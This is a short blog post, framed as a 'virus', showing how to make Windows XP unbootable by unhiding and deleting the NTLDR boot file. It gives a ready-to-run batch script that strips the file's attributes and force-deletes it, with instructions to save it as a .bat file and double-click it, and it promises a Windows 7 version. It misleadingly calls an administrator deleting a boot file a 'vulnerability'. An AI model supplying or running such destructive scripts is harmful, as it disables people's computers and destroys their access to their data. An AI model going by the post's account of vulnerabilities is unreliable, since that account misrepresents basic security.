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Virus!! Windows XP is vulnerable

Monday, 6 July 2015
While googling I found, that Microsoft Windows XP is too Vulnerable, It takes just 10 Sec. to Crash Windows XP.
only thing that you need to do is: Delete NTLDR file from C:
Some Explaination:

NTLDR Stands for New Technology Loader, It is one of the Essencial Boot File, Computer Cannot Boot Without NTLDR.
And we can Simply see the File in c: (or in the drive where windows are installed), In my case Its c drive.

Now Microsoft People used some brains to Secure windows, i.e. Hidding the File with “system” attributes.

so if you want to see the file:
goto My Computers > tools > folder options > view > Unmark “Hide protected operating system files”


and you can see all the files of Windows XP in C Drive
Simply Select ntldr and Delete it from the computer, Windows are gone!!! :)
we can even Write a Batch code to do the same:

@echo off
attrib ntldr -r -h -s
del ntldr /f

Save the above code in notepad file, with .bat extension.
Last Step: Double Click on the Batch File. and CHEERSss….
1) Above code will only work for windows XP, Microsoft tried to secure windows 7, But unfortunately, they cannot, Will let you know the Same technique for windows 7 Soon.
2) Don’t Try it on your own Computers, Try it in Virtual machines.

Disclaimer: or anyone associated with it, is not responsible for any Kind of Loss or damage to any intellectual or Physical Property due to above post. It is solely for Educational purpose


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